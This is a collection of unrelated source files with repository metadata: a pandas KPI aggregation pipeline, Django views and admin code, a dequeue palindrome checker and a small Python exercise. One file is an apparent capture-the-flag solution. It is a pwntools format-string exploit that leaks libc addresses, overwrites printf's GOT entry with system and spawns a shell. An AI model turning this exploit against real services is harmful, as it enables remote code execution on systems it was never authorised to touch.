    is_it_placeholder = df["product_name"].str.startswith("Reserviert IT")
    # TODO: Temporarily exlcude this KPI, wrong Mandant names, no valid entity level
    is_excluded_kpi = df["kpi_name"] == "NCAs: Anzahl Antraege Completed Total"
    return df[~(is_it_placeholder | is_excluded_kpi)]
def prettify_kpi_names(df: pd.DataFrame) -> pd.DataFrame:
    """Cosmetic clean-up of KPI names: restore the umlaut in 'gültig',
    then strip parentheses and the ' Monatl.' suffix.
    """
    cleaned = df["kpi_name"].str.replace("gueltig", "gültig")
    for token in ("(", ")", " Monatl."):
        cleaned = cleaned.str.replace(token, "")
    df["kpi_name"] = cleaned
    return df
def add_mandant_sector_level_columns(df: pd.DataFrame) -> pd.DataFrame:
    """Look-up `mandant` and `sector` values from the PRODUCT_LOOK_UP
    dict (in the `data_dicts` module.) and create new columns. Raise
    when there is a KeyError. Also create a `level` column with all
    values set to '3' (-> 'product level'). Return transformed df.
    """
    try:
        df["mandant"] = df["product_name"].apply(
            lambda x: data_dicts.PRODUCT_LOOK_UP[x]["mandant"]
        )
        df["sector"] = df["product_name"].apply(
            lambda x: data_dicts.PRODUCT_LOOK_UP[x]["sector"]
        )
    except KeyError as e:
        # BUG FIX: the original only printed here and carried on, so the
        # missing columns surfaced later as a confusing downstream error —
        # and contradicted this function's documented contract to raise.
        raise KeyError(
            f"Loaded product not in PRODUCT_LOOK_UP. LOOK_UP has to be updated!: {e}"
        ) from e
    # Everything loaded from the DB is product-level data.
    df["level"] = 3
    # Sanity check
    if df.isna().sum().sum() != 0:
        raise AssertionError(
            "Ups, something went wrong: NaN values in df, please check!"
        )
    return df
def create_max_date_dict(df: pd.DataFrame) -> Dict[str, pd.Timestamp]:
    """Map each unique `product_name` to the last month it appears in.
    (Needed later to correct the over-expansion produced by the full
    month x entity cross-join.)
    """
    last_seen = (
        df[["product_name", "calculation_date"]]
        .sort_values(["product_name", "calculation_date"])
        .drop_duplicates(subset="product_name", keep="last")
    )
    # name=None yields plain (product_name, calculation_date) tuples.
    return dict(last_seen.itertuples(index=False, name=None))
def expand_dataframe_fully(df: pd.DataFrame) -> pd.DataFrame:
    """Expand the dataframe to have a complete time series of
    `calculation_date` for each possible kpi, agg_level, profile combi.
    Non-existent `value` entries get a NaN entry. (This step is necessary
    to ensure correct difference calculation for the values in later
    stages - because in rare cases it is possible that some entities
    get no value for certain months. See old dev notebook's appendix for
    details on this issue.)
    """
    # Cross-join scaffold: every month x every distinct entity/KPI combo,
    # joined via a constant `merge_col`.
    months = pd.DataFrame(
        {"calculation_date": sorted(df["calculation_date"].unique()), "merge_col": 0}
    )
    # All but `calculation_date` and `value`
    rest = df.drop(["calculation_date", "value"], axis=1).drop_duplicates()
    rest["merge_col"] = 0
    temp_tbl = months.merge(rest, how="outer", on="merge_col")
    temp_tbl = temp_tbl.drop(columns={"merge_col"})
    temp_tbl = temp_tbl.sort_values(["kpi_id", "calculation_date"])
    # Left-join the real values back on; combinations that never had a
    # value end up with NaN.
    df = temp_tbl.merge(
        df,
        how="left",
        on=[
            "calculation_date",
            "kpi_id",
            "kpi_name",
            "period_id",
            "product_name",
            "cardprofile",
            "mandant",
            "sector",
            "level",
        ],
    ).reset_index(drop=True)
    # Sanity check
    # 37 periods = 3 years of months + 1; only holds for n_years_back=3.
    if df.shape[0] / len(df.groupby(["product_name", "kpi_name"]).groups.keys()) != 37:
        raise AssertionError(
            "In case you did not load 3 years, something went wrong, please check!"
        )
    return df
def reduce_dataframe_to_max_date_per_entity(
    df: pd.DataFrame, dict_max_date_per_entity: Dict[str, pd.Timestamp]
) -> pd.DataFrame:
    """Drop (in place) every row dated after its entity's last real
    appearance, undoing the over-expansion of the full cross-join so we
    only show entities while they actually exist(ed).
    """
    for product, last_date in dict_max_date_per_entity.items():
        stale = (df["product_name"] == product) & (df["calculation_date"] > last_date)
        df.drop(index=df.index[stale], inplace=True)
    return df
def create_new_mandant_level_rows(df: pd.DataFrame) -> pd.DataFrame:
    """Aggregate the product-level values up to MANDANT level and return
    them as rows shaped like the input frame (same column order), so they
    can later be concatenated with the product-level data.
    """
    group_cols = ["calculation_date", "kpi_id", "kpi_name", "period_id", "mandant", "sector"]
    aggregated = df.groupby(group_cols)["value"].sum().reset_index()
    aggregated["product_name"] = aggregated["mandant"] + " - Total"
    aggregated["cardprofile"] = "all"
    aggregated["level"] = 2
    # Restore the input column order for the later concat.
    aggregated = aggregated.reindex(df.columns, axis=1)
    # Sanity Check
    if aggregated["value"].sum() != df["value"].sum():
        raise AssertionError("Ups, something went wrong, please check.")
    return aggregated
def create_new_sector_level_rows(df: pd.DataFrame) -> pd.DataFrame:
    """Return a dataframe with the aggregated values on SECTOR level.
    Add and fill the necessary columns so that it can be merged with the
    product level values (the original input df) later on.
    """
    # Group without `mandant` so mandants collapse into their sector.
    df_g = df.groupby(
        ["calculation_date", "kpi_id", "kpi_name", "period_id", "sector"]
    )["value"].sum().reset_index()
    # On sector level the mandant is the sector itself.
    df_g["mandant"] = df_g["sector"]
    df_g["product_name"] = df_g["sector"] + " - Total"
    df_g["cardprofile"] = "all"
    df_g["level"] = 1
    # Restore the input column order for the later concat.
    df_g = df_g.reindex(df.columns, axis=1)
    # Sanity Check
    if df_g["value"].sum() != df["value"].sum():
        raise AssertionError("Ups, something went wrong, please check.")
    return df_g
def create_new_overall_level_rows(df: pd.DataFrame) -> pd.DataFrame:
    """Return a dataframe with the aggregated values on OVERALL level.
    Add and fill the necessary columns so that it can be merged with the
    product level values (the original input df) later on.
    """
    # Group across everything except time/KPI -> one row per KPI and month.
    df_g = df.groupby(
        ["calculation_date", "kpi_id", "kpi_name", "period_id"]
    )["value"].sum().reset_index()
    # Company-wide totals are labelled "BCAG" on every hierarchy column.
    df_g["mandant"] = "BCAG"
    df_g["sector"] = "BCAG"
    df_g["product_name"] = df_g["sector"] + " - Total"
    df_g["cardprofile"] = "all"
    df_g["level"] = 0
    # Restore the input column order for the later concat.
    df_g = df_g.reindex(df.columns, axis=1)
    # Sanity Check
    if df_g["value"].sum() != df["value"].sum():
        raise AssertionError("Ups, something went wrong, please check.")
    return df_g
def concatenate_all_levels(
    df: pd.DataFrame,
    df_mandant: pd.DataFrame,
    df_sector: pd.DataFrame,
    df_overall: pd.DataFrame,
) -> pd.DataFrame:
    """Stack product-, mandant-, sector- and overall-level rows into a
    single dataframe with a fresh RangeIndex.
    """
    all_levels = [df, df_mandant, df_sector, df_overall]
    return pd.concat(all_levels, ignore_index=True)
def add_avg_value_column(df):
    """Add an 'value_avg' column where the total value is divided
    by the 'Aktive Konten' of the respective product-date combination.
    If 'Aktive Konten' is missing, fill with np.nan.
    """
    # One chunk per (month, entity); _calc_avg_value appends the column.
    df_grouped = df.groupby(["calculation_date", "product_name"], sort=False)
    df_w_avg = df_grouped.apply(_calc_avg_value)
    # Sanity Check
    # NOTE(review): bare assert is stripped under `python -O`; this also
    # relies on groupby.apply (sort=False) preserving row order — confirm.
    assert df_w_avg.iloc[:, :-1].equals(df), "Uups, something went wrong."
    return df_w_avg
def _calc_avg_value(df_chunk):
    """Return the respective groupby chunk with a new avg column.
    (This is called within `add_avg_value_column`.)
    """
    try:
        # Denominator: the chunk's "Anzahl aktive Konten Total" KPI value.
        n_active = float(
            df_chunk[df_chunk["kpi_name"] == "Anzahl aktive Konten Total"]
            ["value"].values[0]
        )
        # NOTE(review): the +0.001 presumably keeps averages from being
        # exactly zero (display purposes?) — confirm the bias is intended.
        df_chunk["value_avg"] = (
            (pd.to_numeric(df_chunk["value"], errors="raise", downcast="float") + 0.001)
            / n_active
        )
    except IndexError:
        # No active-accounts row in this chunk -> no denominator available.
        df_chunk["value_avg"] = np.nan
    return df_chunk
def sort_and_drop_kpi_id(df: pd.DataFrame) -> pd.DataFrame:
    """Sort the dataframe into its final order (the later aggregation of
    period values depends on it!) and drop `kpi_id`, which is no longer
    needed afterwards.
    """
    sort_columns = [
        "kpi_id",
        "level",
        "mandant",
        "product_name",
        "cardprofile",
        "calculation_date",
    ]
    ordered = df.sort_values(sort_columns)
    return ordered.drop(columns=["kpi_id"])
def save_to_csv(df: pd.DataFrame):
    """Save two copies of the dataframe: The 'working' file that is
    overwriting the old data and will be overwritten next month. And
    a copy that will be permanently stored in the "history" folder.
    """
    # NOTE(review): assumes ./data and ./data/history exist relative to
    # the current working directory — to_csv does not create them.
    df.to_csv("./data/preprocessed_results.csv", index=False)
    # History copy with yearmon_str in name
    end_date = df["calculation_date"].max()
    yearmon_str = str(end_date.date().strftime('%Y-%m'))
    df.to_csv(f"./data/history/{yearmon_str}_preprocessed_results.csv", index=False)
def validate_and_log_results(df: pd.DataFrame):
    """Get some dataframe stats and compare some of them to expected
    values in the PREPROCESS_VALIDATION dict. If unexpected values
    are found, log warnings. (It might well be that the expected values
    in the dict have to be updated if the changes are desired.) Logging
    happens to console and the file `preprocessing.log`.
    """
    # [:-1] skips the last column (value_avg) in the nunique overview.
    nunique_list = [f"- {col}: {df[col].nunique()}" for col in list(df.columns)[:-1]]
    nunique_str = "\n".join(nunique_list)
    nan_list = [f"- {col}: {df[col].isnull().sum()}" for col in list(df.columns)]
    nan_str = "\n".join(nan_list)
    # Expected snapshots come from data_dicts.PREPROCESS_VALIDATION;
    # actuals are derived from the processed dataframe.
    cols_exp = data_dicts.PREPROCESS_VALIDATION["cols"]
    cols_act = list(df.columns)
    mandant_exp = sorted(data_dicts.PREPROCESS_VALIDATION["mandant"])
    mandant_act = sorted([val for val in df["mandant"].unique()])
    profile_exp = sorted(data_dicts.PREPROCESS_VALIDATION["cardprofile"])
    profile_act = sorted(
        [val for val in df["cardprofile"].unique() if isinstance(val, str)]
    )
    agg_level_id_exp = sorted(data_dicts.PREPROCESS_VALIDATION["level"])
    agg_level_id_act = sorted([val for val in df["level"].unique()])
    period_id_exp = sorted(data_dicts.PREPROCESS_VALIDATION["period_id"])
    period_id_act = sorted([val for val in df["period_id"].unique()])
    n_period_exp = data_dicts.PREPROCESS_VALIDATION["n_period"]
    n_period_act = df["calculation_date"].nunique()
    # Log infos
    logger.info(f"LOG FOR PERIOD: {df['calculation_date'].max()}")
    logger.info(
        "# of unique values per (relevant) column in processed df:\n"
        f"{nunique_str}"
    )
    logger.info("# of NaN values per column in processed df:\n" f"{nan_str}")
    logger.info(f"Total rows in dataset: {len(df):,.0f}")
    # Log warnings
    # Each mismatch below is logged (not raised) so a run still completes.
    if not cols_exp == cols_act:
        logger.warning(
            f"\nData cols not as expected!\n"
            f"  Expected columns are:\n  {cols_exp}\n"
            f"  Actual columns are:\n  {cols_act}\n"
        )
    if not n_period_exp == n_period_act:
        logger.warning(
            f"\n# of unique periods not as expected!\n"
            f"  Expected: {n_period_exp}, Actual: {n_period_act}\n\n"
        )
    if not mandant_exp == mandant_act:
        logger.warning(
            f"\nMandant values not as expected!\n"
            f"  Expected mandants are:\n  {mandant_exp}\n"
            f"  Actual mandants are:\n  {mandant_act}\n"
        )
    if not profile_exp == profile_act:
        logger.warning(
            f"Card profile values not as expected!\n"
            f"  Expected profiles are:\n  {profile_exp}\n"
            f"  Actual profiles are:\n  {profile_act}\n"
        )
    if not agg_level_id_exp == agg_level_id_act:
        logger.warning(
            f"Agg_level_id values not as expected!\n"
            f"  Expected agg_level_ids are:\n  {agg_level_id_exp}\n"
            f"  Actual agg_level_ids are:\n  {agg_level_id_act}\n"
        )
    if not period_id_exp == period_id_act:
        logger.warning(
            f"Period_id values not as expected!\n"
            f"  Expected period_ids are:\n  {period_id_exp}\n"
            f"  Actual period_ids are:\n  {period_id_act}\n"
        )
def main(server, db_name):
    """Run the full preprocessing pipeline: load raw KPI data from the
    DB, clean it, aggregate it onto all hierarchy levels, write the CSVs
    and validate/log the result.
    """
    logger.info("Start preprocessing ...")
    # --- Load ---
    connection = connect_to_engine(server, db_name)
    query = read_query("sql_statements/get_results_for_kpi_sheet.sql", n_years_back=3)
    df = create_df(query, connection)
    # --- Clean product-level data ---
    df = create_calculation_date_column(df)
    df = trim_strings(df)
    df = get_rid_of_invalid_entries(df)
    df = prettify_kpi_names(df)
    df = add_mandant_sector_level_columns(df)
    # Remember each entity's last real month BEFORE the full expansion,
    # so the expansion can be trimmed back afterwards.
    dict_max_date_per_entity = create_max_date_dict(df)
    df = expand_dataframe_fully(df)
    df = reduce_dataframe_to_max_date_per_entity(df, dict_max_date_per_entity)
    # --- Aggregate onto higher levels and combine ---
    df_mandant = create_new_mandant_level_rows(df)
    df_sector = create_new_sector_level_rows(df)
    df_overall = create_new_overall_level_rows(df)
    df = concatenate_all_levels(df, df_mandant, df_sector, df_overall)
    df = add_avg_value_column(df)
    df = sort_and_drop_kpi_id(df)
    # --- Persist and validate ---
    save_to_csv(df)
    validate_and_log_results(df)
    logger.info("Preprocessing complete!\n\n")
if __name__ == "__main__":
main(SERVER, DB_NAME)
| [
"r2d4@bluewin.ch"
] | r2d4@bluewin.ch |
128f10fc37c8c1906277ae9126eb1a2336fccdae | 83734e45db81fc69aa360c25ffd7feb93080d855 | /user/views.py | b3d6cb19084c7c21d7305a3f9ee71d328d76390e | [] | no_license | xiaoShuZhou/FreeTechHub-API | d410e785ef4a7abe49011bb6731c752b100a38bf | f0522f965b7f3f1fa45ef5504f46112c949058dd | refs/heads/master | 2022-12-26T11:51:24.608670 | 2020-07-27T03:26:51 | 2020-07-27T03:26:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 934 | py | from .models import User
from .serializers import UserSerializer
from django.http import Http404
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import viewsets
from .serializers import UserSerializer
from .models import User
from rest_framework.permissions import IsAuthenticated
# Create your views here.
class UserViewSet(viewsets.ModelViewSet):
    """Standard CRUD endpoints for User records (DRF ModelViewSet);
    restricted to authenticated callers.
    """
    queryset = User.objects.all()
    serializer_class = UserSerializer
    permission_classes = [
        IsAuthenticated,
    ]
class GetSelfView(APIView):
    """
    Return the serialized User record of the requesting user.
    """
    def get_object(self, pk):
        # Map a missing user to HTTP 404 instead of a server error.
        try:
            return User.objects.get(pk=pk)
        except User.DoesNotExist:
            raise Http404
    def get(self, request, format=None):
        # NOTE(review): assumes request.user is authenticated; an
        # anonymous user id would 404 via get_object — confirm auth setup.
        user = self.get_object(request.user.id)
        serializer = UserSerializer(user)
        return Response(serializer.data)
| [
"47469275+JasonWurunfei@users.noreply.github.com"
] | 47469275+JasonWurunfei@users.noreply.github.com |
0f708cd53d211f89b1ba3db099c9e0a1a8fed082 | ff04c16daddfeab5cf7904bb75f52d0a3a68267e | /WebBoard_Project/manage.py | 47116f3702060ed091f41f1052720dcf60932b95 | [] | no_license | Akshita07/WebBoard_Project | 701fa9bc0df62f246e16e64fe5b700f623c75bba | 44f1e09e5961414eed16e298187c49070e3a38ee | refs/heads/master | 2022-11-03T18:46:18.528896 | 2019-06-16T07:00:36 | 2019-06-16T07:00:36 | 192,040,646 | 0 | 1 | null | 2022-10-07T20:56:22 | 2019-06-15T05:29:12 | Python | UTF-8 | Python | false | false | 636 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Run Django's administrative command-line entry point."""
    # Fall back to the project settings module unless one is already set.
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'WebBoard_Project.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        # Re-raise with an actionable hint while keeping the original cause.
        raise ImportError(
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        ) from exc
    execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"36688304+Akshita07@users.noreply.github.com"
] | 36688304+Akshita07@users.noreply.github.com |
bd31c23a53fffacd0638580ff9cb7e3786df9c48 | 172a56b41939aaff16dbe6b00fe85b714c5b1d3a | /algos/dequeues.py | b8c2d34f9a0a7e57ecdcd39768af60fc5c37909b | [] | no_license | jacindaz/algos_practice | cdb3e990afdc847f18d9d37fee79bbad09f406f5 | 94c23f014f676880217fde41498b92111d0f8fc7 | refs/heads/master | 2020-05-05T12:15:44.812923 | 2019-09-21T16:15:06 | 2019-09-21T16:15:06 | 180,020,598 | 0 | 0 | null | 2019-09-27T04:26:11 | 2019-04-07T20:34:20 | Python | UTF-8 | Python | false | false | 1,032 | py | class Dequeue(object):
def __init__(self, items=[]):
self._items = items
    def add_front(self, item):
        """Add `item` at the front (front is index -1 of the backing list)."""
        self._items.append(item)
    def add_rear(self, item):
        """Add `item` at the rear (index 0 of the backing list); O(n)."""
        self._items.insert(0, item)
    def remove_front(self):
        """Remove and return the front item; raises IndexError when empty."""
        return self._items.pop()
    def remove_rear(self):
        """Remove and return the rear item; O(n) list shift, IndexError when empty."""
        return self._items.pop(0)
    def is_empty(self):
        """Return True if the deque holds no items."""
        return self._items == []
    def size(self):
        """Return the number of items currently stored."""
        return len(self._items)
def is_palindrome(string):
    """Return True if `string` reads the same forwards and backwards.

    Compares the outermost characters pairwise using a dequeue until at
    most one character (the middle of an odd-length string) remains.

    BUG FIX: the original returned False for the empty string, which
    contradicts the usual definition of a palindrome; it also contained
    unreachable `is None` branches (characters are never None).
    """
    dequeue = Dequeue([char for char in string])
    while dequeue.size() > 1:
        if dequeue.remove_front() != dequeue.remove_rear():
            return False
    return True
| [
"jacinda.zhong@cloverhealth.com"
] | jacinda.zhong@cloverhealth.com |
23cef0d0894c76d3618a6ac02c0255f82d0eda72 | f000604ff605cf07acd338c8ecc293db327fe5ff | /2017/njctf/Pingme/test.py | b86d1299c0dc76e40b30bdbc99f75441b9c54b1a | [] | no_license | SteinsGatep001/CTFs | e7316b989bc5170f3e4aba83b027053179353341 | 921747c53261c4fbb4c91fb975fb35f46c952ff5 | refs/heads/master | 2021-07-13T01:42:47.327855 | 2019-01-22T10:25:14 | 2019-01-22T10:25:14 | 105,667,649 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,028 | py | from pwn import *
import sys
#context.log_level = 'debug'
#context.arch = 'amd64'
elf = ELF('./vuln32_fmt')
#io = process('./vuln32_fmt')
def exec_fmt(payload):
    # Probe callback for pwnlib's FmtStr: send one format-string payload
    # over a fresh connection and return whatever the service echoes back.
    io = remote('127.0.0.1', 2333)
    io.send(payload);
    data = io.recv()
    return data
def leak_fmt_off():
    # Let pwnlib auto-detect the format-string argument offset by fuzzing
    # the target through exec_fmt (prints the discovered offset).
    auto_fmt = FmtStr(exec_fmt)
    print auto_fmt.offset
    #payload = fmtstr_payload(auto_fmt.offset,
def vdump_proc():
    # Dump the target's memory to `proc.dump` by abusing the %13$s
    # format-string read: each request leaks a NUL-terminated chunk
    # starting at the current offset from the ELF base (0x8048000).
    vuln_start_addr = 0x8048000
    fp_dump = open('proc.dump', 'ab+')
    leakfunc_offset = 0
    while True:
        io = remote('127.0.0.1', 2333)
        # 'aaa' padding aligns the target address to a 4-byte boundary so
        # %13$s dereferences the appended p32() pointer.
        padd_str = '%' + str(13) + '$s'
        padd_str = padd_str.ljust(8, 'a') + p32(vuln_start_addr+leakfunc_offset)
        io.send(padd_str)
        try:
            data = io.recvuntil('aaa')[:-3]
        except EOFError:
            # Connection died (e.g. unreadable page) — report how far we got.
            print hex(leakfunc_offset)
            sys.exit(0)
        # %s stops at NUL, so account for the terminator before advancing.
        data += '\x00'
        leakfunc_offset += len(data)
        fp_dump.write(data)
        fp_dump.flush()
        io.close()
    fp_dump.close()
# Persistent exploit connection plus fixed addresses taken from the
# (non-PIE) target binary: main() and two GOT slots to leak/overwrite.
io = remote('127.0.0.1', '2333')
main_func_addr = 0x80484CB
printf_got = 0x804A010
read_got = 0x804A00C
def mleak_ping(lk_address):
    # Leak the bytes at `lk_address` over the shared connection via %13$s;
    # the 'aaa' marker delimits the leaked data in the response.
    padd_str = '%13$saaa' + p32(lk_address)
    io.send(padd_str)
    leaked_data = io.recvuntil('aaa')[:-3]
    io.clean()
    return leaked_data
def vexp(system_addr):
    # Final stage: overwrite printf's GOT entry with system() via a
    # format-string write (offset 11), then trigger system("/bin/sh").
    raw_input('continue?')
    payload = fmtstr_payload(11, {printf_got : system_addr})
    io.send(payload)
    io.sendline('/bin/sh')
    io.interactive()
# Leak libc function addresses out of the GOT.
read_addr = u32(mleak_ping(read_got)[:4])
print 'read address:', hex(read_addr)
printf_addr = u32(mleak_ping(printf_got)[:4])
print 'printf address:', hex(printf_addr)
raw_input('leak 2 functions??')
# Scan backwards page by page from printf until the ELF magic marks
# the mapped libc base.
base_addr_m = printf_addr & 0xFFFFF000
libc_base_addr = 0
while True:
    leaked_data = mleak_ping(base_addr_m)
    if len(leaked_data) >= 4:
        if '\x7fELF' in leaked_data:
            print 'libc_base:', hex(base_addr_m)
            break
    base_addr_m -= 0x1000
raw_input('real start?')
# 0x3ada0: hard-coded offset of system() in the target's libc build.
system_addr = base_addr_m + 0x3ada0
vexp(system_addr)
io.close()
| [
"dead0x01@gmail.com"
] | dead0x01@gmail.com |
bf80d9381a2d8dd59805d935f62d71588ff64f50 | 4a62a3d9cd2288346aac244f70384223a5ab75a8 | /MergeByAddress.py | eec0a8d27fb3f8ef619fe14f40e386097eee03e1 | [
"Apache-2.0"
] | permissive | murphyd2/NYCSpillsGeocoding | 035c836d4f1e9327486dff6a326b8b39f07827ae | 806035701a22a26f2fc9b2d9a1e1b66d9cb2992d | refs/heads/master | 2020-03-23T06:08:48.286649 | 2018-08-31T20:44:30 | 2018-08-31T20:44:30 | 141,191,676 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,340 | py | "Dylan Murphy"
"2018-07-12"
"This program attempts to take a csv file. create a dictonary with the building numbers as the keys. merge sort the keys and then create a sorted list of addresses by placing the values for that key [the whole address] at that index"
class Id:
    """One PLUTO record: borough/block/lot tax identifiers plus the split
    address fields (all kept as the raw CSV strings).
    """
    def __init__(self,borough, block, lot, numbers, spaced_numbers, letters, BBL, x, y, E_des):
        self.borough = borough
        self.block= block
        self.lot= lot
        self.numbers=numbers
        self.spaced_numbers= spaced_numbers
        # `letters` (street name) is the sort key used by mergeSort.
        self.letters=letters
        self.BBL=BBL
        self.x=x
        self.y=y
        # E_des is the last CSV field and still carries the line terminator.
        self.E_des= E_des
    def __repr__(self):
        return repr((self.borough, self.block, self.lot, self.numbers,self.spaced_numbers, self.letters, self.BBL, self.x,self.y,self.E_des))
def mergeSort(alist):
    """In-place merge sort of Id-like records, ordered by their `letters`
    attribute (ASCII comparison of the street-name strings).
    """
    if len(alist) <= 1:
        return
    middle = len(alist) // 2
    left, right = alist[:middle], alist[middle:]
    mergeSort(left)
    mergeSort(right)
    read_l = read_r = write = 0
    # Merge the two sorted halves back into alist.
    while read_l < len(left) and read_r < len(right):
        if left[read_l].letters < right[read_r].letters:
            alist[write] = left[read_l]
            read_l += 1
        else:
            alist[write] = right[read_r]
            read_r += 1
        write += 1
    # Copy whichever half still has elements left.
    while read_l < len(left):
        alist[write] = left[read_l]
        read_l += 1
        write += 1
    while read_r < len(right):
        alist[write] = right[read_r]
        read_r += 1
        write += 1
def WriteTo(linelist, outfile):
    """Write the sorted records to a CSV file named `outfile`.

    Each record becomes one comma-joined row; no extra newline is added
    because `E_des` (the last field of a readlines() split) still carries
    the original line terminator.
    """
    # Context manager guarantees the handle is closed even if a write
    # raises (the original opened/closed manually and could leak it).
    with open(str(outfile), 'w') as out_file:
        for record in linelist:
            out_file.write(','.join([
                record.borough, record.block, record.lot, record.numbers,
                record.spaced_numbers, record.letters, record.BBL,
                record.x, record.y, record.E_des,
            ]))
def main():
    """Read MN_PLUTO_SORTED.csv, build one Id record per line, sort the
    records alphabetically by street name and write them to
    MN_PLUTO__ALPHA_SORTED.csv.
    """
    with open("MN_PLUTO_SORTED.csv", 'r') as source:
        data = source.readlines()
    lineList = []  # list of Id objects, one per CSV line
    for line in data:
        fields = line.split(',')
        # BUG FIX: the original wrapped this in `for item in fields` with a
        # never-incremented index, appending len(fields) duplicate records
        # per line. One record per line is the intended behavior.
        # (The unused `linedict` bookkeeping was dropped as well.)
        lineList.append(Id(fields[0], fields[1], fields[2], fields[3],
                           fields[4], fields[5].upper(), fields[6],
                           fields[7], fields[8], fields[9]))
    mergeSort(lineList)
    WriteTo(lineList, "MN_PLUTO__ALPHA_SORTED.csv")
main() | [
"noreply@github.com"
] | murphyd2.noreply@github.com |
0dc9999349bb21967e1e99e4910b150adfb3724f | 2b7ce5b5d5329069b50187fbd1bf7f3522463b76 | /first_site/catalog/admin.py | c2c7092c98220cad34bb8d5bf23ca20d2c7b7404 | [] | no_license | MisterHedgehog/python_django | 7a702c8ee4ef3a31d5fa7488e869626665ef7b9a | 120dad6909c96b944bb34a8ba9f2b02023dea551 | refs/heads/master | 2020-04-12T10:53:11.775661 | 2019-03-14T12:52:05 | 2019-03-14T12:52:05 | 162,443,612 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 443 | py | from .models import Brand, Item, Comment, Notebook, SmartPhone, ComputingDevice, Photo, Tablet, Profile, Clothes
from django.contrib import admin
admin.site.register(Item)
admin.site.register(Brand)
admin.site.register(Comment)
admin.site.register(Notebook)
admin.site.register(SmartPhone)
admin.site.register(ComputingDevice)
admin.site.register(Photo)
admin.site.register(Tablet)
admin.site.register(Profile)
admin.site.register(Clothes)
| [
"andreivoltwin@gmail.com"
] | andreivoltwin@gmail.com |
83d7d27064e446b28ac14be52db8debb3eb29dca | 61d54b5d4e4329bf830a5b88ac75a3d9a0b00ecc | /blog/form.py | 940833cca4affb253c9878332efcacfa54dfcf13 | [] | no_license | majd21/django-blog | 7d34ac6f2b04173677077e693c94b46ce9a08482 | 315bbbb0fdc86974e7bc3033961ba3f5a87be8f8 | refs/heads/main | 2023-02-07T08:15:26.185675 | 2020-12-28T07:39:13 | 2020-12-28T07:39:13 | 324,224,628 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 289 | py | from .models import Blogs ,Comments
from django.forms import ModelForm
class BlogForm(ModelForm):
    """Model-backed form for creating/editing a blog post."""
    class Meta:
        model = Blogs
        fields = ['title' , 'body' , 'image']
class CommentForm(ModelForm):
    """Model-backed form for posting a comment on a blog entry."""
    class Meta:
        model = Comments
fields = ['name' , 'body'] | [
"majidn9877@gamil.com"
] | majidn9877@gamil.com |
2e9229b24034579de5a50820f63ba0a844cc8d76 | 765b765c7b25cd9e6fa7513794a639ecbd210c95 | /powerapi/test_utils/__init__.py | 582930c5a980fc9c881f27d276ff8838ca81f53b | [
"BSD-3-Clause",
"Python-2.0",
"Apache-2.0"
] | permissive | PierreRustOrange/powerapi | 80df09dc72bf248a999216a9f5e0a167b8ea4e5e | 400ee58d3dc9f3bb6706b12571cb10afd8a91787 | refs/heads/master | 2022-02-13T06:15:22.576416 | 2021-10-28T12:01:17 | 2021-10-28T12:01:17 | 244,576,648 | 0 | 0 | BSD-3-Clause | 2020-03-03T08:05:07 | 2020-03-03T08:05:06 | null | UTF-8 | Python | false | false | 1,569 | py | # Copyright (c) 2021, INRIA
# Copyright (c) 2021, University of Lille
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
| [
"arthur.d-azemar@inria.fr"
] | arthur.d-azemar@inria.fr |
a71eaf902c6b63983c91e8caf7675b99dd64e78b | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/303/usersdata/303/80291/submittedfiles/testes.py | f8fdf8b73bca451bb6d4e647f3f675e329669678 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 209 | py | # -*- coding: utf-8 -*-
# Divisible by both 3 and 7 <=> divisible by their lcm, 21.
n = int(input('Digite um numero:'))
if n % 21 == 0:
    print(' O numero é divisivel por 3 e por 7')
else:
    print(' o numero nao é divisivel por 3 e por 7')
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
